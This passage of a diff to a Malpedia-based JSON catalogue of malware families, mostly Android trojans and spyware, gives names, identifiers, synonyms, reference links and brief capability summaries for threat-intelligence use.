"type": [], - "refs": [ - "http://blog.talosintel.com/2016/07/ranscam.html" - ] - } - }, - { - "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", - "value": "ComodoSec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" - ] - } - }, - { - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - } - }, - { - "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", - "value": "Narilam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", - "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" - ] - } - }, - { - "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", - "value": "Skygofree", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", - "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" - ] - } - }, - { - "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", - "value": "MPKBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", - "value": "prb_backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" - ] - } - }, - { - "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "", - 
"meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" - ] - } - }, - { - "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002764.html", - "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" - ] - } - }, - { - "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). 
Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", - "meta": { - "synonyms": [ - "BkLoader", - "Cidox", - "Mayachok" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", - "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", - "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] - } - } - ], - "version": 1, - "source": "Malpedia", - "name": "Malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" + "description": "Malware galaxy cluster based on Malpedia.", + "type": "malpedia", + "authors": [ + "Daniel Plohmann", + "Steffen Enders", + "Andrea Garavaglia", + "Davide Arcuri" + ], + "values": [ + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", + "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" + ] + }, + "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", + "value": "AdultSwine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", + "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", + "https://github.com/DesignativeDave/androrat" + ] + }, + "uuid": "80447111-8085-40a4-a052-420926091ac6", + "value": "AndroRAT", + "description": "Androrat is a remote 
administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", + "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" + ] + }, + "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", + "value": "AnubisSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" + ] + }, + "uuid": "85975621-5126-40cb-8083-55cbfa75121b", + "value": "BankBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", + "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", + "https://www.youtube.com/watch?v=1LOy0ZyjEOk" + ] + }, + "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", + "value": "Catelites", + "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." 
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
+ "http://blog.checkpoint.com/2017/01/24/charger-malware/",
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ ]
+ },
+ "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561",
+ "value": "Charger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Pegasus",
+ "JigglyPuff"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/"
+ ]
+ },
+ "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
+ "value": "Chrysaor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor",
+ "https://twitter.com/LukasStefanko/status/1042297855602503681"
+ ]
+ },
+ "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724",
+ "value": "Clientor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SpyBanker"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic",
+ "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
+ ]
+ },
+ "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
+ "value": "Connic",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/"
+ ]
+ },
+ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
+ "value": "Cpuminer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker",
+ "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
+ ]
+ },
+ "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
+ "value": "DoubleLocker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy",
+ "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
+ ]
+ },
+ "uuid": "8269e779-db23-4c94-aafb-36ee94879417",
+ "value": "DualToy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap",
+ "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
+ ]
+ },
+ "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
+ "value": "Dvmap",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot",
+ "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/"
+ ]
+ },
+ "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd",
+ "value": "ExoBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy",
+ "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
+ ]
+ },
+ "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
+ "value": "FlexiSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "gugi"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet",
+ "https://twitter.com/LukasStefanko/status/886849558143279104"
+ ]
+ },
+ "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
+ "value": "FlexNet",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/"
+ ]
+ },
+ "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
+ "value": "GhostCtrl",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
+ "https://www.clearskysec.com/glancelove/",
+ "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
+ "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
+ "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
+ "https://www.ci-project.org/blog/2017/3/4/arid-viper"
+ ]
+ },
+ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
+ "value": "GlanceLove",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat",
+ "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/"
+ ]
+ },
+ "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6",
+ "value": "HeroRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
+ ]
+ },
+ "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
+ "value": "IRRat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat",
+ "https://blog.lookout.com/mobile-threat-jaderat"
+ ]
+ },
+ "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0",
+ "value": "JadeRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid",
+ "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html",
+ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/"
+ ]
+ },
+ "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
+ "value": "KevDroid",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler",
+ "https://twitter.com/LukasStefanko/status/928262059875213312"
+ ]
+ },
+ "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3",
+ "value": "Koler",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
+ ]
+ },
+ "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
+ "value": "Lazarus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990"
+ ]
+ },
+ "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c",
+ "value": "Lazarus ELF Backdoor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki",
+ "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/"
+ ]
+ },
+ "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f",
+ "value": "Loki",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
+ "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
+ ]
+ },
+ "uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
+ "value": "LokiBot",
+ "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ExoBot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
+ "https://www.clientsidedetection.com/marcher.html",
+ "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
+ ]
+ },
+ "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
+ "value": "Marcher",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
+ "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
+ "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
+ ]
+ },
+ "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826",
+ "value": "MazarBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot",
+ "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
+ ]
+ },
+ "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
+ "value": "MysteryBot",
+ "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat",
+ "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
+ "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co"
+ ]
+ },
+ "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5",
+ "value": "OmniRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Popr-d30"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30",
+ "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
+ "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
+ ]
+ },
+ "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
+ "value": "X-Agent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub"
+ ]
+ },
+ "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
+ "value": "Fake Pornhub",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir",
+ "https://twitter.com/PhysicalDrive0/statuses/798825019316916224"
+ ]
+ },
+ "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef",
+ "value": "Raxir",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
+ "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores"
+ ]
+ },
+ "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
+ "value": "RedAlert2",
+ "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe",
+ "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
+ "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
+ "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
+ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
+ "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html"
+ ]
+ },
+ "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
+ "value": "Retefe",
+ "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
+ "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
+ "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
+ ]
+ },
+ "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
+ "value": "Roaming Mantis",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik",
+ "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
+ "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
+ ]
+ },
+ "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
+ "value": "Rootnik",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree",
+ "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/",
+ "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf"
+ ]
+ },
+ "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22",
+ "value": "Skygofree",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SlemBunk"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo",
+ "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html",
+ "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
+ ]
+ },
+ "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
+ "value": "Slempo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
+ ]
+ },
+ "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0",
+ "value": "Slocker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy"
+ ]
+ },
+ "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
+ "value": "SMSspy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker",
+ "https://news.drweb.com/show/?i=11104&lng=en",
+ "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
+ ]
+ },
+ "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04",
+ "value": "SpyBanker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ ]
+ },
+ "uuid": "31592c69-d540-4617-8253-71ae0c45526c",
+ "value": "SpyNote",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
+ ]
+ },
+ "uuid": "0777cb30-534f-44bb-a7af-906a422bd624",
+ "value": "StealthAgent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango",
+ "https://www.lookout.com/info/stealth-mango-report-ty"
+ ]
+ },
+ "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f",
+ "value": "Stealth Mango",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng",
+ "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
+ ]
+ },
+ "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
+ "value": "Svpeng",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher",
+ "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
+ ]
+ },
+ "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
+ "value": "Switcher",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
+ ]
+ },
+ "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea",
+ "value": "TeleRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar",
+ "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware"
+ ]
+ },
+ "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff",
+ "value": "TemptingCedar Spyware",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Catelites Android Bot",
+ "MarsElite Android Bot"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz",
+ "http://blog.group-ib.com/cron"
+ ]
+ },
+ "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
+ "value": "TinyZ",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan",
+ "https://blog.lookout.com/titan-mobile-threat",
+ "https://www.alienvault.com/blogs/labs-research/delivery-keyboy"
+ ]
+ },
+ "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327",
+ "value": "Titan",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada",
+ "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
+ "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html",
+ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
+ "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
+ "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/"
+ ]
+ },
